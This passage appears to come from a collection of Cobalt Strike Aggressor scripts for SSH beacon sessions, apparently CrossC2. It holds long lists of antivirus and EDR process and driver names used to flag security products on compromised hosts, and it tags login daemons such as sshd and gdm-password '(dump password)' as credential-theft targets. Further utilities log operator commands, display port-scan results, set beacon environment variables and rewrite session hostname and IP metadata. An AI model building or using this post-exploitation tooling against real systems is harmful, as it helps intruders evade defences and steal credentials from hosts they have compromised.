"showbehind", "shstat", "siteadv", "smOutlookPack", "smc", "smoutlookpack", "sms", "smsesp", "smss32", "sndmon", "sndsrvc", "soap", "sofi", "softManager", "spbbcsvc", "spf", "sphinx", "spideragent", "spiderml", "spidernt", "spiderui", "spntsvc", "spoler", "spoolcv", "spoolsv32", "spyxx", "srexe", "srng", "srvload", "srvmon", "ss3edit", "sschk", "ssg_4104", "ssgrate", "st2", "stcloader", "stinger", "stopp", "stwatchdog", "supftrl", "support", "supporter5", "svcGenericHost", "svcharge", "svchostc", "svchosts", "svcntaux", "svdealer", "svframe", "svtray", "swdsvc", "sweep95", "sweepnet.sweepsrv.swnetsup", "sweepsrv", "swnetsup", "swnxt", "swserver", "symlcsvc", "symproxysvc", "symsport", "symtray", "symwsc", "sysdoc32", "sysedit", "sysupd", 
"taskmo", "taumon", "tbmon", "tbscan", "tc", "tca", "tclproc", "tcm", "tdimon", "tds-3", "tds2-98", "tds2-nt", "teekids", "tfak", "tfak5", "tgbob", "titanin", "titaninxp", "tmas", "tmlisten", "tmntsrv", "tmpfw", "tmproxy", "tnbutil", "tpsrv", "tracesweeper", "trickler", "trjscan", "trjsetup", "trojantrap3", "trupd", "tsadbot", "tvmd", "tvtmd", "udaterui", "undoboot", "unvet32", "updat", "updtnv28", "upfile", "upgrad", "uplive", "urllstck", "usergate", "usrprmpt", "utpost", "v2iconsole", "v3clnsrv", "v3exec", "v3imscn", "vbcmserv", "vbcons", "vbust", "vbwin9x", "vbwinntw", "vcsetup", "vet32", "vet95", "vetmsg", "vettray", "vfsetup", "vir-help", "virusmdpersonalfirewall", "vnlan300", "vnpc3000", "vpatch", "vpc32", "vpc42", "vpfw30s", "vprosvc", "vptray", "vrv", "vrvmail", "vrvmon", "vrvnet", "vscan40", "vscenu6.02d30", "vsched", "vsecomr", "vshwin32", "vsisetup", "vsmain", "vsmon", "vsserv", "vsstat", "vstskmgr", "vswin9xe", "vswinntse", "vswinperse", "w32dsm89", "w9x", "watchdog", "webdav", "webproxy", "webscanx", "webtrap", "webtrapnt", "wfindv32", "wfxctl32", "wfxmod32", "wfxsnt40", "whoswatchingme", "wimmun32", "win-bugsfix", "winactive", "winmain", "winnet", "winppr32", "winrecon", "winroute", "winservn", "winssk32", "winstart", "winstart001", "wintsk32", "winupdate", "wkufind", "wnad", "wnt", "wradmin", "wrctrl", "wsbgate", "wssfcmai", "wupdater", "wupdt", "wyvernworksfirewall", "xagt", "xagtnotif", "xcommsvr", "xfilter", "xpf202en", "zanda", "zapro", "zapsetup3001", "zatutor", "zhudongfangyu", "zlclient", "zlh", "zonalm2601", "zonealarm"); 19 | 20 | #edr 21 | @edr = @("CiscoAMPCEFWDriver", "CiscoAMPHeurDriver", "cbstream", "cbk7", "Parity", "libwamf", "LRAgentMF", "BrCow_x_x_x_x", "brfilter", "BDSandBox", "TRUFOS", "AVC3", "Atc", "AVCKF", "bddevflt", "gzflt", "bdsvm", "hbflt", "cve", "psepfilter", "cposfw", "dsfa", "medlpflt", "epregflt", "TmFileEncDmk", "tmevtmgr", "TmEsFlt", "fileflt", "SakMFile", "SakFile", "AcDriver", "TMUMH", "hfileflt", "TMUMS", 
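"MfeEEFF", "mfprom", "hdlpflt", "swin", "mfehidk", "mfencoas", "epdrv", "carbonblackk", "csacentr", "csaenh", "csareg", "csascr", "csaav", "csaam", "esensor", "fsgk", "fsatp", "fshs", "eaw", "im", "csagent", "rvsavd", "dgdmk", "atrsdfw", "mbamwatchdog", "edevmon", "SentinelMonitor", "edrsensor", "ehdrv", "HexisFSMonitor", "CyOptics", "CarbonBlackK", "CyProtectDrv32", "CyProtectDrv64", "CRExecPrev", "ssfmonm", "CybKernelTracker", "SAVOnAccess", "savonaccess", "sld", "aswSP", "FeKern", "klifks", "klifaa", "Klifsm", "mfeaskm", "mfencfilter", "WFP_MRT", "groundling32", "SAFE-Agent", "groundling64", "avgtpx86", "avgtpx64", "pgpwdefs", "GEProtection", "diflt", "sysMon", "ssrfsf", "emxdrv2", "reghook", "spbbcdrv", "bhdrvx86", "bhdrvx64", "SISIPSFileFilter", "symevent", "VirtualAgent", "vxfsrep", "VirtFile", "SymAFR", "symefasi", "symefa", "symefa64", "SymHsm", "evmf", "GEFCMP", "VFSEnc", "pgpfs", "fencry", "symrg", "cfrmd", "cmdccav", "cmdguard", "CmdMnEfs", "MyDLPMF", "PSINPROC", "PSINFILE", "amfsm", "amm8660", "amm6460");

# Remote-admin / interactive tools (highlighted LIGHT BLUE).
@admin = @("ssh", "zabbix_agentd", "zabbix_server", "vim", "top", "nc", "vnc", "telnet");
# Daemons that handle logins / authentication - shown as "(dump password)" (BLUE).
@login = @("sshd", "lightdm", "gnome-keyring-daemon", "gdm-password", "vsftpd", "apache2");
# Browser processes (GREEN). "chromuim" was a misspelling that could never
# match a real process name; it is spelled "chromium" here.
@browsers = @("chrome", "chromium", "firefox", "safari");


# Lower-cases every element of the array passed as $1 and returns it.
# Nothing in this file calls it any more (format_ps uses map() below, which
# also truncates); it is kept for compatibility.
sub lcarray {
    local('@array $index $value');
    @array = $1;
    foreach $index => $value (@array) {
        @array[$index] = lc($value);
    }
    return @array;
}

# Builds one row of the process table.
#   $1 pid, $2 ppid, $3 display name (already suffixed), $4 arch,
#   $5 session/TTY, $6 user, $7 colour code ("" for no highlight).
# The *_formatted keys carry the width-padded strings used when printing.
sub cc2_ps_row {
    local('$pid $ppid $name $arch $session $user $color');
    ($pid, $ppid, $name, $arch, $session, $user, $color) = @_;
    return %(pid => $pid,
             ppid => $ppid,
             pid_formatted => "$[5]pid",
             ppid_formatted => "$[5]ppid",
             color => $color,
             name => $name,
             arch => "$[5]arch",
             session => "$[11]session",
             user => $user);
}

# Seeds $2 with every process in $1 whose parent is not in the listing
# (plus PID 0, which is always treated as a root).  These are the roots of
# the process tree; their indent is the empty string.
sub buildOrphanage {
    local('$proc $candidate $is_orphan');
    foreach $proc ($1) {
        $is_orphan = true;
        foreach $candidate ($1) {
            if ($proc['ppid'] == $candidate['pid']) {
                $is_orphan = false;
                break;
            }
        }

        # PID zero - its gotta be an orphan, poor kid
        if ($proc['pid'] == 0) {
            $is_orphan = true;
        }

        if ($is_orphan) {
            $proc['indent'] = "";
            push($2, $proc);
        }
    }
}

# Returns the index in array $1 of the row whose pid equals $2, or $null.
sub findArrayElement {
    local('$index $entry');
    foreach $index => $entry ($1) {
        if ($entry['pid'] == $2) {
            return $index;
        }
    }
    return $null;
}

# One tree-building pass: for every parent in $2 (current tree) copy it into
# the scratch array $1 and insert its children from $3 directly under it,
# then move the result back into $2 and empty $1.
#   $1 scratch array, $2 the tree being built, $3 all rows (pid-descending
#   so that inserting each child at parent+1 yields ascending pid order).
sub addChildrenProcesses {
    local('$parent $child $arrayIndex');
    foreach $parent ($2) {
        $arrayIndex = findArrayElement($1, $parent['pid']);

        # Identity check on purpose: "== $null" coerces numerically in Sleep,
        # so a parent sitting at index 0 would otherwise look "missing" and
        # be pushed a second time.
        if ($arrayIndex is $null) {
            push($1, $parent);
            $arrayIndex = size($1) - 1;
        }

        foreach $child ($3) {
            if ($child['ppid'] == $parent['pid'] && $child['ppid'] != $child['pid']) {
                $child['indent'] = $parent['indent'] . " ";
                add($1, $child, $arrayIndex + 1);
            }
        }
    }

    # Update $2 in place instead of rebinding the positional argument
    # ("$2 = copy($1)"), which would depend on how Sleep passes arguments.
    clear($2);
    foreach $parent ($1) {
        push($2, $parent);
    }
    clear($1);
}

# bps() callback for SSH sessions: renders the process listing in $2 as a
# colour-highlighted tree and logs it to the beacon console.
#   $1 beacon id, $2 raw "ps" output (tab-separated: name ppid pid arch user tty).
# Highlights: the session's own PID (yellow), AV/EDR names (red),
# login/auth daemons (blue), browsers (green), admin tools (light blue).
sub format_ps {
    global('@av @av1 @edr @admin @login @browsers');
    global('@ps @final_ps @reverse_ps @temp_ps');
    local('$bid $computer $si $ei $realpid $outps $temp $name $ppid $pid $arch $user $session $lname $color $label $prev_size $temp_name');
    local('@format_av @format_av1 @format_edr @format_admin @format_login');
    $bid = $1;

    # The "computer" field carries this session's PID in parentheses,
    # e.g. "host (1234)"; fall back to "" rather than substr() on $null.
    $computer = beacon_info($1, "computer");
    $si = indexOf($computer, "(");
    $ei = indexOf($computer, ")");
    if ($si is $null || $ei is $null) {
        $realpid = "";
    } else {
        $realpid = substr($computer, $si + 1, $ei);
    }

    # Compare on the lower-cased first 15 characters - presumably because the
    # kernel reports command names truncated to 15 chars; TODO confirm.
    @format_av = map({ return lc(mid($1, 0, 15)); }, @av);
    @format_av1 = map({ return lc(mid($1, 0, 15)); }, @av1);
    @format_edr = map({ return lc(mid($1, 0, 15)); }, @edr);
    @format_admin = map({ return lc(mid($1, 0, 15)); }, @admin);
    @format_login = map({ return lc(mid($1, 0, 15)); }, @login);

    $outps .= "\cC[*]\o Process List with process highlighting\n";
    $outps .= "\cC[*]\o Current Running PID: \c8 Yellow ". $realpid ." \o \n";
    $outps .= "\cC[*]\o Login/Auth daemons (dump password): \c2 BLUE \o \n";
    $outps .= "\cC[*]\o Admin Tools: \cB LIGHT BLUE \o \n";
    $outps .= "\cC[*]\o Browsers: \c3 GREEN \o \n";
    $outps .= "\cC[*]\o AV/EDR: \c4 RED \o \n\n";
    $outps .= " PID PPID Name User TTY Path\n";
    $outps .= "\cE --- ---- ---- ---- ------- ----\n";

    foreach $temp (split("\n", ["$2" trim])) {
        # blank lines have no fields to split and would break the name parse
        if (["$temp" trim] eq "") {
            continue;
        }
        ($name, $ppid, $pid, $arch, $user, $session) = split("\t", $temp);
        # the name arrives wrapped in parentheses, "(bash)" -> "bash"
        $name = substr($name, 1, lindexOf($name, ")"));
        $lname = lc($name);

        # First match wins; the beacon's own PID takes precedence over every
        # other class (so the admin-tools check no longer needs a PID guard).
        if ($pid == $realpid) {
            $color = "\c8";
            $label = ' (beacon)';
        }
        else if ($lname in @format_av || $lname in @format_av1) {
            $color = "\c4";
            $label = ' (AV)';
        }
        else if ($lname in @format_edr) {
            $color = "\c4";
            $label = ' (EDR)';
        }
        else if ($lname in @format_login) {
            $color = "\c2";
            $label = ' (dump password)';
        }
        else if ($lname in @browsers) {
            $color = "\c3";
            $label = '';
        }
        else if ($lname in @format_admin) {
            $color = "\cB";
            $label = ' (tools)';
        }
        else {
            $color = "";
            $label = '';
        }

        push(@ps, cc2_ps_row($pid, $ppid, $name . $label, $arch, $session, $user, $color));
    }

    # sort the processes please
    sort({ return $1['pid'] <=> $2['pid']; }, @ps);

    # get the @ps array in a reverse order for the ascending child sorting order
    @reverse_ps = reverse(@ps);

    buildOrphanage(@ps, @final_ps);

    # Keep attaching children until every row is placed.  Stop as soon as a
    # pass makes no progress (e.g. a parent/child cycle) instead of hanging
    # the client in an infinite loop.
    $prev_size = -1;
    while (size(@final_ps) < size(@ps) && size(@final_ps) != $prev_size) {
        $prev_size = size(@final_ps);
        addChildrenProcesses(@temp_ps, @final_ps, @reverse_ps);
    }

    # anything still unplaced is appended as a root so it is not silently dropped
    if (size(@final_ps) < size(@ps)) {
        foreach $temp (@ps) {
            if (findArrayElement(@final_ps, $temp['pid']) is $null) {
                $temp['indent'] = "";
                push(@final_ps, $temp);
            }
        }
    }

    # append to our outstring
    foreach $temp (@final_ps) {
        $temp_name = $temp['indent'] . $temp['name'];
        $outps .= "$temp['color'] $temp['pid_formatted'] $temp['ppid_formatted'] $[38]temp_name $temp['user'] $temp['session'] $temp['arch']\o\n";
    }

    # these arrays are global and would otherwise carry over into the next run
    clear(@final_ps);
    clear(@ps);
    clear(@temp_ps);

    blog($bid, $outps);
}

# "ps" inside an SSH session goes through format_ps instead of the default renderer.
ssh_alias ps {
    bps($1, &format_ps);
}
--------------------------------------------------------------------------------
/utils/logvis.cna:
--------------------------------------------------------------------------------
# Beacon Command Log visualization
# Author: @001SPARTaN (for @r3dqu1nn)
# Tracks all your commands you executed on every beacon
#
# Only "ssh_input" rows of the beaconlog data model are listed, i.e. commands
# typed into SSH sessions.

import ui.*;
import table.*;

import java.awt.*;
import javax.swing.*;
import javax.swing.table.*;

global('$sshlog_model $sshlog_content $sshlog_table');

# Rebuilds $sshlog_model from the teamserver's beaconlog.
# Safe to call before the tab has been opened: the beacon_input hook below
# fires regardless, so this returns early while the model does not exist yet.
sub updateSSHLogTable {
    if ($sshlog_model is $null) {
        return;
    }
    fork({
        local('@entry %modelEntry $bid $computer $si $ei $pid');

        # Clear the model so we can put new stuff in it.
        [$sshlog_model clear: 1024];

        foreach @entry (data_query('beaconlog')) {
            # as indexed here: [0] type, [1] bid, [2] operator, [3] text, [4] timestamp
            if (@entry[0] ne "ssh_input") {
                continue;
            }
            $bid = @entry[1];
            $computer = binfo($bid, "computer");

            # the "computer" field carries the session PID in parentheses;
            # leave pid empty rather than substr() on $null when it is absent
            $si = indexOf($computer, "(");
            $ei = indexOf($computer, ")");
            if ($si is $null || $ei is $null) {
                $pid = "";
            } else {
                $pid = substr($computer, $si + 1, $ei);
            }

            # a fresh hash per row so rows can never alias one another
            %modelEntry = %(operator  => @entry[2],
                            ip        => binfo($bid, "internal"),
                            hostname  => $computer,
                            user      => binfo($bid, "user"),
                            pid       => $pid,
                            command   => @entry[3],
                            timestamp => formatDate(@entry[4], "MMM dd HH:mm:ss z"));

            # Add the new entry to $sshlog_model
            [$sshlog_model addEntry: %modelEntry];
        }
        # Update with the new table
        [$sshlog_model fireListeners];
    }, \$sshlog_model);
}

# setupPopupMenu provided by Raphael Mudge
# https://gist.github.com/rsmudge/87ce80cd8d8d185c5870d559af2dc0c2
# Attaches a right-click handler to Swing component $1 that opens the
# Aggressor popup named $2.  Also used by portscan_result.cna.
sub setupPopupMenu {
    # we're using fork({}) to run this in a separate Aggressor Script environment.
    # This reduces deadlock potential due to Sleep's global interpreter lock
    #
    # this especially matters as our mouse listener will be fired for *everything*
    # to include mouse movements.
    fork({
        [$component addMouseListener: lambda({
            if ([$1 isPopupTrigger]) {
                # If right click, show popup
                show_popup($1, $name, $component);
            }
        }, \$component, \$name)];
    }, $component => $1, $name => $2, $sshlog_model => $sshlog_model, $sshlog_table => $sshlog_table);
}

# Builds the table, sorter and scroll pane for the SSH command log and
# registers it as a visualization.  Returns the scroll pane for addTab().
sub createSSHLogVisualization {
    this('$sshlog_sorter');
    # GenericTableModel from table.*
    # Columns for each data model
    $sshlog_model = [new GenericTableModel: @("operator", "ip", "hostname", "user", "pid", "command", "timestamp"), "beacon", 16];

    # Create a table from the GenericTableModel
    $sshlog_table = [new ATable: $sshlog_model];

    # Controls how the column headers will sort the table.
    # Columns 0-3 are text; "pid" (4) is the numeric one.  The numeric
    # comparator used to sit on "user", which made that sort a no-op for
    # non-numeric user names.
    $sshlog_sorter = [new TableRowSorter: $sshlog_model];

    [$sshlog_sorter setComparator: 0, {
        return $1 cmp $2;
    }];

    [$sshlog_sorter setComparator: 1, {
        return $1 cmp $2;
    }];

    [$sshlog_sorter setComparator: 2, {
        return $1 cmp $2;
    }];

    [$sshlog_sorter setComparator: 3, {
        return $1 cmp $2;
    }];

    [$sshlog_sorter setComparator: 4, {
        return $1 <=> $2;
    }];

    # initial sort on the "user" column
    [$sshlog_sorter toggleSortOrder: 3];

    # Set $sshlog_sorter as the row sorter for $sshlog_table
    [$sshlog_table setRowSorter: $sshlog_sorter];

    # Create a split pane (divider you can drag around)
    $sshlog_content = [new JScrollPane: $sshlog_table];

    # Set popup menu for the table
    setupPopupMenu($sshlog_table, "command_log");

    updateSSHLogTable();

    # Register the visualization with CS
    addVisualization("Beacon Command Log", $sshlog_content);
    return $sshlog_content;
}

popup command_log {
    item "Copy Logs" {
        local('$selected $row $mrow $operator $ip $hostname $user $proc $time $command');
        $selected = "";
        foreach $row ([$sshlog_table getSelectedRows]) {
            # getSelectedRows() returns *view* indices; once the user has
            # sorted a column these no longer match the model rows, so map
            # them back before reading from the model.
            $mrow = [$sshlog_table convertRowIndexToModel: $row];

            # operator [ip_hostname] user/proc | timestamp> command
            $operator = [$sshlog_model getValueAt: $mrow, 0];
            $ip = [$sshlog_model getValueAt: $mrow, 1];
            $hostname = [$sshlog_model getValueAt: $mrow, 2];
            $user = [$sshlog_model getValueAt: $mrow, 3];
            $proc = [$sshlog_model getValueAt: $mrow, 4];
            $time = [$sshlog_model getValueAt: $mrow, 6];
            $command = [$sshlog_model getValueAt: $mrow, 5];

            $selected .= "$operator \[$ip\_$hostname\] $user\/$proc | $time\> $command\n";
        }
        add_to_clipboard($selected);
    }
    item "Copy Command" {
        local('$selected $row $mrow $command');
        $selected = "";
        foreach $row ([$sshlog_table getSelectedRows]) {
            $mrow = [$sshlog_table convertRowIndexToModel: $row];
            $command = [$sshlog_model getValueAt: $mrow, 5];

            # one command per line; previously several selected commands were
            # glued together into a single string
            $selected .= $command . "\n";
        }
        add_to_clipboard($selected);
    }
}

popup generator {
    item "SSH Command Log" {
        # Show the visualization
        addTab("SSH Beacon Command Log", createSSHLogVisualization(), "All commands you have executed in a beacon");
    }
}

# refresh on every beacon input; the update itself filters to ssh_input rows
on beacon_input {
    updateSSHLogTable();
}
--------------------------------------------------------------------------------
/utils/modifyMetaData.cna:
--------------------------------------------------------------------------------
# Rewrites session metadata on the teamserver for the given beacon ids.
#   $1 beacon id(s), $2 one of "setostype" / "setlocalip" / "sethostname",
#   $3 the new value (for the IP/hostname cases it is only the default shown
#   in the prompt; the operator-supplied value is what gets applied).
# The previous IP / hostname is logged to each beacon console before it is
# replaced so the change can be traced back.  Unknown $2 values do nothing.
sub openModifyMetaData {
    local('$bids $data_type $data_value');
    $bids = $1;
    $data_type = $2;
    $data_value = $3;

    if ($data_type eq "setostype") {
        bsetostype($bids, $data_value);
    } else if ($data_type eq "setlocalip") {
        prompt_text("Modify Session MetaData(Internal IP): ", $data_value, lambda({
            if ($1) {
                foreach $bid ($bids) {
                    $o_ip = binfo($bid, "internal");
                    blog($bid, "");
                    blog($bid, "original IP : $o_ip ");
                }
                bsetlocalip($bids, $1);
            }
        }, $bids => $1));
    } else if ($data_type eq "sethostname") {
        prompt_text("Modify Session MetaData(HostName): ", $data_value, lambda({
            if ($1) {
                foreach $bid ($bids) {
                    $o_hostname = binfo($bid, "computer");
                    blog($bid, "");
                    blog($bid, "original HostName: $o_hostname ");
                }
                bsethostname($bids, $1);
            }
        }, $bids => $1));
    }
}
--------------------------------------------------------------------------------
/utils/portscan_result.cna:
--------------------------------------------------------------------------------
#### Port Scan Results ####
## See and sort results from portscan module in a new tab
## Author: Alyssa (@ramen0x3f)
## Last Updated: 2018-08-08

## CREDIT ##
# This script uses the awesome visualization/tab code made by @001SPARTaN (for @r3dqu1nn)
# As seen here: https://github.com/harleyQu1nn/AggressorScripts/blob/master/logvis.cna

## Usage ##
# View > "Port Scan Results". Click column to sort.
#
# Depends on setupPopupMenu() from logvis.cna being loaded first.  No popup
# named "portscan_res" is defined in this file, so the right-click menu is
# empty until one is added.

######################################################################

import ui.*;
import table.*;

import java.awt.*;
import javax.swing.*;
import javax.swing.table.*;

global('$ps_model $ps_content $ps_table');

# Rebuilds $ps_model from the "services" data model (address/port/banner).
# Returns early if the table has not been created yet.
sub updatePSTable {
    if ($ps_model is $null) {
        return;
    }
    fork({
        local('@entry %modelEntry');

        # Clear the model so we can put new stuff in it.
        [$ps_model clear: 1024];

        foreach @entry (data_query('services')) {
            %modelEntry = %(address => @entry['address'],
                            port    => @entry['port'],
                            banner  => @entry['banner']);

            # Add the new entry to $ps_model
            [$ps_model addEntry: %modelEntry];
        }
        # Update with the new table
        [$ps_model fireListeners];
    }, \$ps_model);
}

# Builds the table, sorter and scroll pane for the port-scan results and
# registers it as a visualization.  Returns the scroll pane for addTab().
sub createPSVisualization {
    this('$ps_sorter');
    # GenericTableModel from table.*
    # Columns for each data model
    $ps_model = [new GenericTableModel: @("address", "port", "banner"), "beacon", 16];

    # Create a table from the GenericTableModel
    $ps_table = [new ATable: $ps_model];

    # Controls how the column headers will sort the table.
    # This model only has columns 0-2; the copied-over "column 3" calls
    # (toggleSortOrder/setComparator) addressed a column that does not exist
    # and DefaultRowSorter rejects out-of-range columns, so they are gone.
    $ps_sorter = [new TableRowSorter: $ps_model];

    [$ps_sorter setComparator: 0, {
        return $1 cmp $2;
    }];

    # port sorts numerically, not as text
    [$ps_sorter setComparator: 1, {
        return $1 <=> $2;
    }];

    [$ps_sorter setComparator: 2, {
        return $1 cmp $2;
    }];

    # initial sort on the "address" column
    [$ps_sorter toggleSortOrder: 0];

    # Set $ps_sorter as the row sorter for $ps_table
    [$ps_table setRowSorter: $ps_sorter];

    # Create a split pane (divider you can drag around)
    $ps_content = [new JScrollPane: $ps_table];

    # Set popup menu for the table
    setupPopupMenu($ps_table, "portscan_res");

    updatePSTable();

    # Register the visualization with CS
    addVisualization("Port Scan Results", $ps_content);
    return $ps_content;
}

popup generator {
    item "Port Scan Results" {
        # Show the visualization
        addTab("Port Scan Results", createPSVisualization(), "All discovered services from portscan");
    }
}

--------------------------------------------------------------------------------
/utils/setEnv.cna: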
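--------------------------------------------------------------------------------
# Callback for the SetEnv dialog.
#   $1 the dialog, $2 the button pressed, $3 the dialog's value map
#   (beaconid / envKey / envValue - beaconid comes from the defaults map
#   passed to dialog() below).
sub openSetEnvDialogCallBack {
    local('$envKey $envValue');
    $envKey = $3['envKey'];
    $envValue = $3['envValue'];
    # read the beacon id from the dialog's own values instead of a global
    # so two dialogs opened for different sessions cannot cross over
    bcc2_setenv($3['beaconid'], $envKey, $envValue);
}

# Opens the "set environment variable" dialog for beacon $1.
sub openSetEnvDialog {
    local('$dialog');
    $dialog = dialog("SetEnv", %(beaconid => $1, envKey => "TEST_PATH", envValue => "/usr/bin/:/usr/sbin/:/bin/:/sbin/"), &openSetEnvDialogCallBack);
    dialog_description($dialog, "setenv");

    drow_text($dialog, "envKey", "envKey: ", "");
    drow_text($dialog, "envValue", "envValue: ", "");

    dbutton_action($dialog, "set");
    dialog_show($dialog);
}

# Prompts for a variable name and unsets it on beacon(s) $1.
sub openUnSetEnvDialog {
    prompt_text("unsetenv: ", "TEST_PATH", lambda({
        # $1 is the text entered; an empty answer cancels
        if ($1) {
            bcc2_unsetenv($bids, $1);
        }
    }, $bids => $1));
}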